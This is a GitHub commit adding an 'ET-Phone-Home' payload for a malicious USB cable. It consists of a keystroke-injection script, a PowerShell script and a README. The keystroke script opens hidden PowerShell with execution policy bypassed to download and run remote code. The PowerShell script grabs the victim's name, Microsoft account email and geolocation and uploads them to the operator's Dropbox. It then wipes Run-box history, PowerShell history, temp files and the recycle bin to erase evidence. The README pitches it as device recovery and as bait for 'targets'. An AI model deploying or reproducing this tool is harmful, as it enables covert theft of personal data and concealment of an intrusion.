NEW-PayLoad ET-Phone-Home

pull/35/head
I-Am-Jakoby 2022-04-28 05:28:03 -05:00 committed by GitHub
parent e35fc2e8b3
commit a20015c4a4
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 293 additions and 0 deletions

View File

@ -0,0 +1,14 @@
REM this script will download and execute your locator script if your wifi access point is not detected
REM this script needs to be saved in the boot directory to have it run as soon as your device is plugged in
REM Replace SSID with name of wifi your computer is connected to
IF_NOT_PRESENT SSID="Home"
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
ENTER
REM Remember to replace the link with your DropBox shared link for the intended file to download
REM Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properly

View File

@ -0,0 +1,151 @@
############################################################################################################################################################
# | ___ _ _ _ # ,d88b.d88b #
# Title : OMG-ET-Phone-Home | |_ _| __ _ _ __ ___ | | __ _ | | __ ___ | |__ _ _ # 88888888888 #
# Author : I am Jakoby | | | / _` | | '_ ` _ \ _ | | / _` | | |/ / / _ \ | '_ \ | | | |# `Y8888888Y' #
# Version : 1.0 | | | | (_| | | | | | | | | |_| | | (_| | | < | (_) | | |_) | | |_| |# `Y888Y' #
# Category : Incident-Response | |___| \__,_| |_| |_| |_| \___/ \__,_| |_|\_\ \___/ |_.__/ \__, |# `Y' #
# Target : Windows 7,10,11 | |___/ # /\/|_ __/\\ #
# Mode : HID | |\__/,| (`\ # / -\ /- ~\ #
# | My crime is that of curiosity |_ _ |.--.) )# \ = Y =T_ = / #
# | and yea curiosity killed the cat ( T ) / # Luther )==*(` `) ~ \ Hobo #
# | but satisfaction brought him back (((^_(((/(((_/ # / \ / \ #
#__________________________________|_________________________________________________________________________# | | ) ~ ( #
# # / \ / ~ \ #
# github.com/I-Am-Jakoby # \ / \~ ~/ #
# twitter.com/I_Am_Jakoby # /\_/\_/\__ _/_/\_/\__~__/_/\_/\_/\_/\_/\_#
# instagram.com/i_am_jakoby # | | | | ) ) | | | (( | | | | | |#
# youtube.com/c/IamJakoby # | | | |( ( | | | \\ | | | | | |#
############################################################################################################################################################
<#
.SYNOPSIS
This script is meant to recover your device or as an advanced recon tactic to get sensitive info on your target
.DESCRIPTION
This program is used to locate your stolen cable. Or perhaps locate your "stolen" cable if you left it as bait.
This script will get the Name and email associated with the targets microsoft account
Their geo-location will also be grabbed giving you the latitude and longitude of where your device was activated
#>
#------------------------------------------------------------------------------------------------------------------------------------
$FileName = "$env:USERNAME-$(get-date -f yyyy-MM-dd_hh-mm)_Device-Location.txt"
#------------------------------------------------------------------------------------------------------------------------------------
function Get-fullName {
try {
$fullName = Net User $Env:username | Select-String -Pattern "Full Name";$fullName = ("$fullName").TrimStart("Full Name")
}
# If no name is detected function will return $env:UserName
# Write Error is just for troubleshooting
catch {Write-Error "No name was detected"
return $env:UserName
-ErrorAction SilentlyContinue
}
return $fullName
}
$FN = Get-fullName
#------------------------------------------------------------------------------------------------------------------------------------
function Get-email {
try {
$email = GPRESULT -Z /USER $Env:username | Select-String -Pattern "([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})" -AllMatches;$email = ("$email").Trim()
return $email
}
# If no email is detected function will return backup message for sapi speak
# Write Error is just for troubleshooting
catch {Write-Error "An email was not found"
return "No Email Detected"
-ErrorAction SilentlyContinue
}
}
$EM = Get-email
#------------------------------------------------------------------------------------------------------------------------------------
function Get-GeoLocation{
try {
Add-Type -AssemblyName System.Device #Required to access System.Device.Location namespace
$GeoWatcher = New-Object System.Device.Location.GeoCoordinateWatcher #Create the required object
$GeoWatcher.Start() #Begin resolving current locaton
while (($GeoWatcher.Status -ne 'Ready') -and ($GeoWatcher.Permission -ne 'Denied')) {
Start-Sleep -Milliseconds 100 #Wait for discovery.
}
if ($GeoWatcher.Permission -eq 'Denied'){
Write-Error 'Access Denied for Location Information'
} else {
$GeoWatcher.Position.Location | Select Latitude,Longitude #Select the relevent results.
}
}
# Write Error is just for troubleshooting
catch {Write-Error "No coordinates found"
return "No Coordinates found"
-ErrorAction SilentlyContinue
}
}
$GL = Get-GeoLocation
#------------------------------------------------------------------------------------------------------------------------------------
echo $FN >> $env:TMP\$FileName
echo $EM >> $env:TMP\$FileName
echo $GL >> $env:TMP\$FileName
#------------------------------------------------------------------------------------------------------------------------------------
# Upload output file to dropbox
$DropBoxAccessToken = "YOUR-DROPBOX-ACCESS-TOKEN"
$TargetFilePath="/$FileName"
$SourceFilePath="$env:TMP\$FileName"
$arg = '{ "path": "' + $TargetFilePath + '", "mode": "add", "autorename": true, "mute": false }'
$authorization = "Bearer " + $DropBoxAccessToken
$headers = New-Object "System.Collections.Generic.Dictionary[[String],[String]]"
$headers.Add("Authorization", $authorization)
$headers.Add("Dropbox-API-Arg", $arg)
$headers.Add("Content-Type", 'application/octet-stream')
Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload -Method Post -InFile $SourceFilePath -Headers $headers
#------------------------------------------------------------------------------------------------------------------------------------
<#
.NOTES
This is to clean up behind you and remove any evidence to prove you were there
#>
# Delete contents of Temp folder
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
# Delete run box history
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
# Delete powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath
# Deletes contents of recycle bin
Clear-RecycleBin -Force -ErrorAction SilentlyContinue

View File

@ -0,0 +1,128 @@
![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/OMG-AcidBurn/logo-170-px.png?raw=true)
<!-- TABLE OF CONTENTS -->
<details>
<summary>Table of Contents</summary>
<ol>
<li><a href="#Description">Description</a></li>
<li><a href="#getting-started">Getting Started</a></li>
<li><a href="#Contributing">Contributing</a></li>
<li><a href="#Version-History">Version History</a></li>
<li><a href="#Contact">Contact</a></li>
<li><a href="#Acknowledgments">Acknowledgments</a></li>
</ol>
</details>
# OMG ET Phone Home
A script I put together to locate your stolen devices, or your "stolen" baited devices
## Description
This program is meant to locate your devices. Save the execution file on the boot partition of your devices and when someone plugs it into their computer
Using a one liner in the run box a script will be downloaded and executed that grabs the Name and email of the associated microsoft account and the
latitude and longitude of where the device was activated. This information is stored in a text document that is then uploaded to your dropbox.
Finally the end of the script will delete the runbox and powershell history and delete the files in the TMP Folder and Recycle Bin.
## Getting Started
### Dependencies
* DropBox - Your Shared link for the intended file
* Windows 7,10,11
<p align="right">(<a href="#top">back to top</a>)</p>
### Executing program
* Your device is plugged into the targets computer
* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory if your intended wifi network is not detected with the
geofencing options
```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https:// < Your Shared link for the intended file> ?dl=1; invoke-expression $pl
```
* The OMG device will attempt to detect the Wifi Access point you designated, if it does not..
* A one liner in the run box will download and execute the ET-Phone-Home Script
* This script will get the Name and Email associated with the microsoft account of the persons computer your device connected to
* The latitude and longitude of where the device was when it was activated will also be collected
* This gathered information will be saved to a text file in the TMP Directory
* That file will be uploaded to your DropBox cloud storage
Something Like What you see below will be in your cloud storage:
NAME
EMAIL
LATITUDE AND LONGITUDE
```
Jakoby
jakoby@example.com
Latitude Longitude
-------- ---------
37.778919 -122.416313
```
<p align="right">(<a href="#top">back to top</a>)</p>
## Contributing
All contributors names will be listed here
I am Jakoby
Kalani
<p align="right">(<a href="#top">back to top</a>)</p>
## Version History
* 0.1
* Initial Release
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- CONTACT -->
## Contact
<div><h2>I am Jakoby</h2></div>
<p><br/>
<img src="https://media.giphy.com/media/VgCDAzcKvsR6OM0uWg/giphy.gif" width="50">
<a href="https://github.com/I-Am-Jakoby/">
<img src="https://img.shields.io/badge/GitHub-I--Am--Jakoby-blue">
</a>
<a href="https://www.instagram.com/i_am_jakoby/">
<img src="https://img.shields.io/badge/Instagram-i__am__jakoby-red">
</a>
<a href="https://twitter.com/I_Am_Jakoby/">
<img src="https://img.shields.io/badge/Twitter-I__Am__Jakoby-blue">
</a>
<a href="https://www.youtube.com/c/IamJakoby/">
<img src="https://img.shields.io/badge/YouTube-I_am_Jakoby-red">
</a>
Project Link: [https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG-ET-Phone-Home)
</p>
<p align="right">(<a href="#top">back to top</a>)</p>
<!-- ACKNOWLEDGMENTS -->
## Acknowledgments
* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
<p align="right">(<a href="#top">back to top</a>)</p>